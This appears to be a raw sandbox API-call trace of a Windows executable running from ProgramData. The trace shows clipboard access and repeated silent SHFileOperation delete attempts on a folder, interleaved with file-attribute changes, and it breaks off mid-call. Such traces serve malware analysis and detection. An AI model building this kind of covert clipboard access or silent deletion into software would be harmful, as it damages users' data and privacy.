[0085.385] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.385] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.385] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.385] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.385] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.385] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.385] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.385] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.385] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.385] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.385] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.385] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.385] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.385] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.385] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.385] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.385] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.385] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.385] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.385] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.385] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.385] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.385] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.385] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.385] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.385] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.385] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.385] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.385] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.385] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.385] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.385] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.385] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.385] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.385] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.385] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.385] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.385] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.385] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.385] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.386] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.386] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.386] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.386] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.386] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.386] KillTimer (hWnd=0x0, uIDEvent=0x2) returned 0 [0085.386] GetForegroundWindow () returned 0x1005e [0085.386] GetWindowLongA (hWnd=0x1005e, nIndex=-4) returned 0 [0085.386] SetActiveWindow (hWnd=0x1005e) returned 0x0 [0085.386] SetWindowLongA (hWnd=0x1005e, nIndex=-4, dwNewLong=0) returned 0 [0085.386] OleInitialize (pvReserved=0x0) returned 0x0 [0085.388] OleGetClipboard (in: ppDataObj=0x18f494 | out: ppDataObj=0x18f494*=0x28e328) returned 0x0 [0085.389] CoInitialize (pvReserved=0x0) returned 0x1 [0085.389] CoCreateInstance (in: rclsid=0x18fae0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), pUnkOuter=0x0, dwClsContext=0x4, riid=0x5583b740*(Data1=0x112, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18fe0c | out: ppv=0x18fe0c*=0x0) returned 0x80040154 [0086.775] StrDupA (lpSrch="buffer text") returned="buffer text" [0086.775] LocalFree (hMem=0x2a1788) returned 0x0 [0086.775] FormatMessageA (in: dwFlags=0x1000, lpSource=0x0, dwMessageId=0x80040154, dwLanguageId=0x800, lpBuffer=0x18c624, nSize=0x78, Arguments=0x0 | out: lpBuffer="Class not registered\r\n") returned 0x16 [0086.783] OutputDebugStringA (lpOutputString="Class not registered\r\n") [0086.784] GetDC (hWnd=0x0) returned 0x301027a [0086.784] CreateCompatibleDC (hdc=0x301027a) returned 0x6010278 [0086.784] GetIconInfo (in: hIcon=0x0, piconinfo=0x18eecc | out: piconinfo=0x18eecc) returned 0 [0086.784] SetFileAttributesW (lpFileName="ݯ瘀盢Őnjǔnj\x02", dwFileAttributes=0x20) returned 0 [0086.784] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1815d8 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0086.785] GetFullPathNameA (in: lpFileName="C:.", nBufferLength=0x104, lpBuffer=0x18a058, lpFilePart=0x1817f4 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x1817f4*="system32") returned 0x13 [0086.785] SetFileAttributesW (lpFileName="ݯ瘀\x16￾￿㲣盭\x02", dwFileAttributes=0x20) returned 0 [0086.785] SetFileAttributesW (lpFileName="ݯ", dwFileAttributes=0x20) returned 0 [0086.785] GetDC (hWnd=0x0) returned 0xa0107de [0086.785] CreateCompatibleDC (hdc=0xa0107de) returned 0xe0107d8 [0086.785] GetIconInfo (in: hIcon=0x0, piconinfo=0x18efd0 | out: piconinfo=0x18efd0) returned 0 [0086.785] GetDC (hWnd=0x0) returned 0xb0107da [0086.785] CreateCompatibleDC (hdc=0xb0107da) returned 0x30101c0 [0086.785] GetIconInfo (in: hIcon=0x0, piconinfo=0x18eef4 | out: piconinfo=0x18eef4) returned 0 [0086.785] SetFileAttributesW (lpFileName="ݯ", dwFileAttributes=0x20) returned 0 [0086.786] SetFileAttributesW (lpFileName="ݯ", dwFileAttributes=0x20) returned 0 [0086.786] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18e9ec, nSize=0x104 | out: lpFilename="C:\\ProgramData\\BCE1010314.exe" (normalized: "c:\\programdata\\bce1010314.exe")) returned 0x1d [0086.786] PathRemoveFileSpecA (in: pszPath="C:\\ProgramData\\BCE1010314.exe" | out: pszPath="C:\\ProgramData") returned 1 [0086.786] wsprintfA (in: param_1=0x18e9ec, param_2="%sFolder" | out: param_1="C:\\ProgramDataFolder") returned 20 [0086.954] SHFileOperationA (in: lpFileOp=0x18f714*(hwnd=0x0, wFunc=0x3, pFrom="C:\\ProgramDataFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="") | out: lpFileOp=0x18f714*(hwnd=0x0, wFunc=0x3, pFrom="C:\\ProgramDataFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="")) returned 2 [0087.440] SetFileAttributesW (lpFileName="ݯĀ↫nj", dwFileAttributes=0x20) returned 0 [0087.440] GetDC (hWnd=0x0) returned 0x3010228 [0087.440] CreateCompatibleDC (hdc=0x3010228) returned 0x6010225 [0087.440] GetIconInfo (in: hIcon=0x0, piconinfo=0x18eea4 | out: piconinfo=0x18eea4) returned 0 [0087.440] GetDC (hWnd=0x0) returned 0x3010226 [0087.440] CreateCompatibleDC (hdc=0x3010226) returned 0x6010223 [0087.440] GetIconInfo (in: hIcon=0x0, piconinfo=0x18ee7c | out: piconinfo=0x18ee7c) returned 0 [0087.440] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1815f0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0087.440] GetFullPathNameA (in: lpFileName="C:.", nBufferLength=0x104, lpBuffer=0x18ac74, lpFilePart=0x18180c | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x18180c*="system32") returned 0x13 [0087.440] GetDC (hWnd=0x0) returned 0x3010224 [0087.440] CreateCompatibleDC (hdc=0x3010224) returned 0x6010221 [0087.440] GetIconInfo (in: hIcon=0x0, piconinfo=0x18ee54 | out: piconinfo=0x18ee54) returned 0 [0087.440] GetDC (hWnd=0x0) returned 0x3010222 [0087.440] CreateCompatibleDC (hdc=0x3010222) returned 0x601021f [0087.440] GetIconInfo (in: hIcon=0x0, piconinfo=0x18ee2c | out: piconinfo=0x18ee2c) returned 0 [0087.440] SetFileAttributesW (lpFileName="ݯ", dwFileAttributes=0x20) returned 0 [0087.440] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18e5dc, nSize=0x104 | out: lpFilename="C:\\ProgramData\\BCE1010314.exe" (normalized: "c:\\programdata\\bce1010314.exe")) returned 0x1d [0087.440] PathRemoveFileSpecA (in: pszPath="C:\\ProgramData\\BCE1010314.exe" | out: pszPath="C:\\ProgramData") returned 1 [0087.440] wsprintfA (in: param_1=0x18e5dc, param_2="%sFolder" | out: param_1="C:\\ProgramDataFolder") returned 20 [0087.440] SHFileOperationA (in: lpFileOp=0x18f514*(hwnd=0x0, wFunc=0x3, pFrom="C:\\ProgramDataFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle=0x450000) | out: lpFileOp=0x18f514*(hwnd=0x0, wFunc=0x3, pFrom="C:\\ProgramDataFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle=0x450000)) returned 2 [0087.442] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1815f0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0087.442] GetFullPathNameA (in: lpFileName="C:.", nBufferLength=0x104, lpBuffer=0x189640, lpFilePart=0x18180c | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x18180c*="system32") returned 0x13 [0087.442] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1815f0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0087.442] GetFullPathNameA (in: lpFileName="C:.", nBufferLength=0x104, lpBuffer=0x18c3a4, lpFilePart=0x18180c | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x18180c*="system32") returned 0x13 [0087.442] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1815e4 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0087.442] GetFullPathNameA (in: lpFileName="C:.", nBufferLength=0x104, lpBuffer=0x18c1a0, lpFilePart=0x181800 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x181800*="system32") returned 0x13 [0087.442] SetFileAttributesW (lpFileName="ݯ縀", dwFileAttributes=0x20) returned 0 [0087.442] GetDC (hWnd=0x0) returned 0x3010220 [0087.442] CreateCompatibleDC (hdc=0x3010220) returned 0x601021d [0087.442] GetIconInfo (in: hIcon=0x0, piconinfo=0x18ee40 | out: piconinfo=0x18ee40) returned 0 [0087.442] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18e8e8, nSize=0x104 | out: lpFilename="C:\\ProgramData\\BCE1010314.exe" (normalized: "c:\\programdata\\bce1010314.exe")) returned 0x1d [0087.442] PathRemoveFileSpecA (in: pszPath="C:\\ProgramData\\BCE1010314.exe" | out: pszPath="C:\\ProgramData") returned 1 [0087.442] wsprintfA (in: param_1=0x18e8e8, param_2="%sFolder" | out: param_1="C:\\ProgramDataFolder") returned 20 [0087.443] SHFileOperationA (in: lpFileOp=0x18f6d4*(hwnd=0x0, wFunc=0x3, pFrom="C:\\ProgramDataFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="") | out: lpFileOp=0x18f6d4*(hwnd=0x0, wFunc=0x3, pFrom="C:\\ProgramDataFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="")) returned 2 [0087.444] SetFileAttributesW (lpFileName="ݯ䌀䕄䝆䥈䭊", dwFileAttributes=0x20) returned 0 [0087.444] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1815d8 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0087.444] GetFullPathNameA (in: lpFileName="C:.", nBufferLength=0x104, lpBuffer=0x18bf9c, lpFilePart=0x1817f4 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x1817f4*="system32") returned 0x13 [0087.444] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1815d8 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0087.444] GetFullPathNameA (in: lpFileName="C:.", nBufferLength=0x104, lpBuffer=0x18bd98, lpFilePart=0x1817f4 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x1817f4*="system32") returned 0x13 [0087.444] SetFileAttributesW (lpFileName="ݯ", dwFileAttributes=0x20) returned 0 [0087.444] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18ddbc, nSize=0x104 | out: lpFilename="C:\\ProgramData\\BCE1010314.exe" (normalized: "c:\\programdata\\bce1010314.exe")) returned 0x1d [0087.444] PathRemoveFileSpecA (in: pszPath="C:\\ProgramData\\BCE1010314.exe" | out: pszPath="C:\\ProgramData") returned 1 [0087.444] wsprintfA (in: param_1=0x18ddbc, param_2="%sFolder" | out: param_1="C:\\ProgramDataFolder") returned 20 [0087.444] SHFileOperationA (in: lpFileOp=0x18f5d4*(hwnd=0x0, wFunc=0x3, pFrom="C:\\ProgramDataFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle=0xa50000) | out: lpFileOp=0x18f5d4*(hwnd=0x0, wFunc=0x3, pFrom="C:\\ProgramDataFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle=0xa50000)) returned 2 [0087.445] GetDC (hWnd=0x0) returned 0x301021e [0087.446] CreateCompatibleDC (hdc=0x301021e) returned 0x601021b [0087.446] GetIconInfo (in: hIcon=0x0, piconinfo=0x18ee90 | out: piconinfo=0x18ee90) returned 0 [0087.446] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1815f0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0087.446] GetFullPathNameA (in: lpFileName="C:.", nBufferLength=0x104, lpBuffer=0x18bb94, lpFilePart=0x18180c | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x18180c*="system32") returned 0x13 [0087.446] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1815d8 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0087.446] GetFullPathNameA (in: lpFileName="C:.", nBufferLength=0x104, lpBuffer=0x18c4a8, lpFilePart=0x1817f4 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x1817f4*="system32") returned 0x13 [0087.446] SetFileAttributesW (lpFileName="ݯ였Änj\x01", dwFileAttributes=0x20) returned 0 [0087.446] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18e3d4, nSize=0x104 | out: lpFilename="C:\\ProgramData\\BCE1010314.exe" (normalized: "c:\\programdata\\bce1010314.exe")) returned 0x1d [0087.446] PathRemoveFileSpecA (in: pszPath="C:\\ProgramData\\BCE1010314.exe" | out: pszPath="C:\\ProgramData") returned 1 [0087.446] wsprintfA (in: param_1=0x18e3d4, param_2="%sFolder" | out: param_1="C:\\ProgramDataFolder") returned 20 [0087.446] SHFileOperationA (in: lpFileOp=0x18f694*(hwnd=0x0, wFunc=0x3, pFrom="C:\\ProgramDataFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle=0x0) | out: lpFileOp=0x18f694*(hwnd=0x0, wFunc=0x3, pFrom="C:\\ProgramDataFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle=0x0)) returned 2 [0087.447] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1815f0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0087.447] GetFullPathNameA (in: lpFileName="C:.", nBufferLength=0x104, lpBuffer=0x18b790, lpFilePart=0x18180c | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x18180c*="system32") returned 0x13 [0087.447] SetFileAttributesW (lpFileName="ݯ琀￿￿ﯚ盫褊痏\x02", dwFileAttributes=0x20) returned 0 [0087.447] GetDC (hWnd=0x0) returned 0x301021c [0087.447] CreateCompatibleDC (hdc=0x301021c) returned 0x6010219 [0087.447] GetIconInfo (in: hIcon=0x0, piconinfo=0x18efbc | out: piconinfo=0x18efbc) returned 0 [0087.447] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18d9ac, nSize=0x104 | out: lpFilename="C:\\ProgramData\\BCE1010314.exe" (normalized: "c:\\programdata\\bce1010314.exe")) returned 0x1d [0087.447] PathRemoveFileSpecA (in: pszPath="C:\\ProgramData\\BCE1010314.exe" | out: pszPath="C:\\ProgramData") returned 1 [0087.447] wsprintfA (in: param_1=0x18d9ac, param_2="%sFolder" | out: param_1="C:\\ProgramDataFolder") returned 20 [0087.447] SHFileOperationA (in: lpFileOp=0x18f554*(hwnd=0x0, wFunc=0x3, pFrom="C:\\ProgramDataFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle=0x450000) | out: lpFileOp=0x18f554*(hwnd=0x0, wFunc=0x3, pFrom="C:\\ProgramDataFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle=0x450000)) returned 2 [0087.449] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1815f0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0087.449] GetFullPathNameA (in: lpFileName="C:.", nBufferLength=0x104, lpBuffer=0x18b58c, lpFilePart=0x18180c | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x18180c*="system32") returned 0x13 [0087.449] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1815d8 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0087.449] GetFullPathNameA (in: lpFileName="C:.", nBufferLength=0x104, lpBuffer=0x18b388, lpFilePart=0x1817f4 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x1817f4*="system32") returned 0x13 [0087.449] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18e1cc, nSize=0x104 | out: lpFilename="C:\\ProgramData\\BCE1010314.exe" (normalized: "c:\\programdata\\bce1010314.exe")) returned 0x1d [0087.449] PathRemoveFileSpecA (in: pszPath="C:\\ProgramData\\BCE1010314.exe" | out: pszPath="C:\\ProgramData") returned 1 [0087.449] wsprintfA (in: param_1=0x18e1cc, param_2="%sFolder" | out: param_1="C:\\ProgramDataFolder") returned 20 [0087.449] SHFileOperationA (in: lpFileOp=0x18f654*(hwnd=0x0, wFunc=0x3, pFrom="C:\\ProgramDataFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle=0xc50000) | out: lpFileOp=0x18f654*(hwnd=0x0, wFunc=0x3, pFrom="C:\\ProgramDataFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle=0xc50000)) returned 2 [0087.451] GetDC (hWnd=0x0) returned 0x301021a [0087.451] CreateCompatibleDC (hdc=0x301021a) returned 0x6010217 [0087.451] GetIconInfo (in: hIcon=0x0, piconinfo=0x18eee0 | out: piconinfo=0x18eee0) returned 0 [0087.451] SetFileAttributesW (lpFileName="ݯĀﺬ\x18㢞盭ĸnj\x02", dwFileAttributes=0x20) returned 0 [0087.451] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18dbb4, nSize=0x104 | out: lpFilename="C:\\ProgramData\\BCE1010314.exe" (normalized: "c:\\programdata\\bce1010314.exe")) returned 0x1d [0087.451] PathRemoveFileSpecA (in: pszPath="C:\\ProgramData\\BCE1010314.exe" | out: pszPath="C:\\ProgramData") returned 1 [0087.451] wsprintfA (in: param_1=0x18dbb4, param_2="%sFolder" | out: param_1="C:\\ProgramDataFolder") returned 20 [0087.451] SHFileOperationA (in: lpFileOp=0x18f594*(hwnd=0x0, wFunc=0x3, pFrom="C:\\ProgramDataFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle=0x20260000) | out: lpFileOp=0x18f594*(hwnd=0x0, wFunc=0x3, pFrom="C:\\ProgramDataFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle=0x20260000)) returned 2 [0087.452] SetFileAttributesW (lpFileName="ݯἀŐnjŐnj↰nj\x02", dwFileAttributes=0x20) returned 0 [0087.452] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18dfc4, nSize=0x104 | out: lpFilename="C:\\ProgramData\\BCE1010314.exe" (normalized: "c:\\programdata\\bce1010314.exe")) returned 0x1d [0087.452] PathRemoveFileSpecA (in: pszPath="C:\\ProgramData\\BCE1010314.exe" | out: pszPath="C:\\ProgramData") returned 1 [0087.452] wsprintfA (in: param_1=0x18dfc4, param_2="%sFolder" | out: param_1="C:\\ProgramDataFolder") returned 20 [0087.452] SHFileOperationA (in: lpFileOp=0x18f754*(hwnd=0x0, wFunc=0x3, pFrom="C:\\ProgramDataFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle=0x5d0000) | out: lpFileOp=0x18f754*(hwnd=0x0, wFunc=0x3, pFrom="C:\\ProgramDataFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle=0x5d0000)) returned 2 [0087.454] GetDC (hWnd=0x0) returned 0x3010218 [0087.454] CreateCompatibleDC (hdc=0x3010218) returned 0x6010215 [0087.454] GetIconInfo (in: hIcon=0x0, piconinfo=0x18ef94 | out: piconinfo=0x18ef94) returned 0 [0087.454] GetDC (hWnd=0x0) returned 0x3010216 [0087.454] CreateCompatibleDC (hdc=0x3010216) returned 0x6010213 [0087.454] GetIconInfo (in: hIcon=0x0, piconinfo=0x18ef80 | out: piconinfo=0x18ef80) returned 0 [0087.454] SetFileAttributesW (lpFileName="ݯ", dwFileAttributes=0x20) returned 0 [0087.454] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18e7e4, nSize=0x104 | out: lpFilename="C:\\ProgramData\\BCE1010314.exe" (normalized: "c:\\programdata\\bce1010314.exe")) returned 0x1d [0087.454] PathRemoveFileSpecA (in: pszPath="C:\\ProgramData\\BCE1010314.exe" | out: pszPath="C:\\ProgramData") returned 1 [0087.454] wsprintfA (in: param_1=0x18e7e4, param_2="%sFolder" | out: param_1="C:\\ProgramDataFolder") returned 20 [0087.454] SHFileOperationA (in: lpFileOp=0x18f734*(hwnd=0x0, wFunc=0x3, pFrom="C:\\ProgramDataFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle=0x4d0000) | out: lpFileOp=0x18f734*(hwnd=0x0, wFunc=0x3, pFrom="C:\\ProgramDataFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle=0x4d0000)) returned 2 [0087.456] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1815f0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0087.456] GetFullPathNameA (in: lpFileName="C:.", nBufferLength=0x104, lpBuffer=0x18b184, lpFilePart=0x18180c | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x18180c*="system32") returned 0x13 [0087.456] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18e6e0, nSize=0x104 | out: lpFilename="C:\\ProgramData\\BCE1010314.exe" (normalized: "c:\\programdata\\bce1010314.exe")) returned 0x1d [0087.456] PathRemoveFileSpecA (in: pszPath="C:\\ProgramData\\BCE1010314.exe" | out: pszPath="C:\\ProgramData") returned 1 [0087.456] wsprintfA (in: param_1=0x18e6e0, param_2="%sFolder" | out: param_1="C:\\ProgramDataFolder") returned 20 [0087.456] SHFileOperationA (in: lpFileOp=0x18f6f4*(hwnd=0x0, wFunc=0x3, pFrom="C:\\ProgramDataFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle=0x2d0000) | out: lpFileOp=0x18f6f4*(hwnd=0x0, wFunc=0x3, pFrom="C:\\ProgramDataFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle=0x2d0000)) returned 2 [0087.457] SetFileAttributesW (lpFileName="ݯ", dwFileAttributes=0x20) returned 0 [0087.457] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1815f0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0087.457] GetFullPathNameA (in: lpFileName="C:.", nBufferLength=0x104, lpBuffer=0x18af80, lpFilePart=0x18180c | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x18180c*="system32") returned 0x13 [0087.457] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1815d8 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0087.457] GetFullPathNameA (in: lpFileName="C:.", nBufferLength=0x104, lpBuffer=0x18ad78, lpFilePart=0x1817f4 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x1817f4*="system32") returned 0x13 [0087.457] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18e4d8, nSize=0x104 | out: lpFilename="C:\\ProgramData\\BCE1010314.exe" (normalized: "c:\\programdata\\bce1010314.exe")) returned 0x1d [0087.457] PathRemoveFileSpecA (in: pszPath="C:\\ProgramData\\BCE1010314.exe" | out: pszPath="C:\\ProgramData") returned 1 [0087.457] wsprintfA (in: param_1=0x18e4d8, param_2="%sFolder" | out: param_1="C:\\ProgramDataFolder") returned 20 [0087.457] SHFileOperationA (in: lpFileOp=0x18f6b4*(hwnd=0x0, wFunc=0x3, pFrom="C:\\ProgramDataFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle=0xd0000) | out: lpFileOp=0x18f6b4*(hwnd=0x0, wFunc=0x3, pFrom="C:\\ProgramDataFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle=0xd0000)) returned 2 [0087.458] SetFileAttributesW (lpFileName="ݯ", dwFileAttributes=0x20) returned 0 [0087.459] SetFileAttributesW (lpFileName="ݯ", dwFileAttributes=0x20) returned 0 [0087.459] GetDC (hWnd=0x0) returned 0x3010214 [0087.459] CreateCompatibleDC (hdc=0x3010214) returned 0x6010211 [0087.459] GetIconInfo (in: hIcon=0x0, piconinfo=0x18ef6c | out: piconinfo=0x18ef6c) returned 0 [0087.459] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1815d8 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0087.459] GetFullPathNameA (in: lpFileName="C:.", nBufferLength=0x104, lpBuffer=0x18ab70, lpFilePart=0x1817f4 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x1817f4*="system32") returned 0x13 [0087.459] GetDC (hWnd=0x0) returned 0x3010212 [0087.459] CreateCompatibleDC (hdc=0x3010212) returned 0x601020f [0087.459] GetIconInfo (in: hIcon=0x0, piconinfo=0x18ef58 | out: piconinfo=0x18ef58) returned 0 [0087.459] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18e2d0, nSize=0x104 | out: lpFilename="C:\\ProgramData\\BCE1010314.exe" (normalized: "c:\\programdata\\bce1010314.exe")) returned 0x1d [0087.459] PathRemoveFileSpecA (in: pszPath="C:\\ProgramData\\BCE1010314.exe" | out: pszPath="C:\\ProgramData") returned 1 [0087.459] wsprintfA (in: param_1=0x18e2d0, param_2="%sFolder" | out: param_1="C:\\ProgramDataFolder") returned 20 [0087.459] SHFileOperationA (in: lpFileOp=0x18f674*(hwnd=0x0, wFunc=0x3, pFrom="C:\\ProgramDataFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle=0xd50000) | out: lpFileOp=0x18f674*(hwnd=0x0, wFunc=0x3, pFrom="C:\\ProgramDataFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle=0xd50000)) returned 2 [0087.460] SetFileAttributesW (lpFileName="ݯ", dwFileAttributes=0x20) returned 0 [0087.460] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18e0c8, nSize=0x104 | out: lpFilename="C:\\ProgramData\\BCE1010314.exe" (normalized: "c:\\programdata\\bce1010314.exe")) returned 0x1d [0087.460] PathRemoveFileSpecA (in: pszPath="C:\\ProgramData\\BCE1010314.exe" | out: pszPath="C:\\ProgramData") returned 1 [0087.460] wsprintfA (in: param_1=0x18e0c8, param_2="%sFolder" | out: param_1="C:\\ProgramDataFolder") returned 20 [0087.460] SHFileOperationA (in: lpFileOp=0x18f634*(hwnd=0x0, wFunc=0x3, pFrom="C:\\ProgramDataFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, 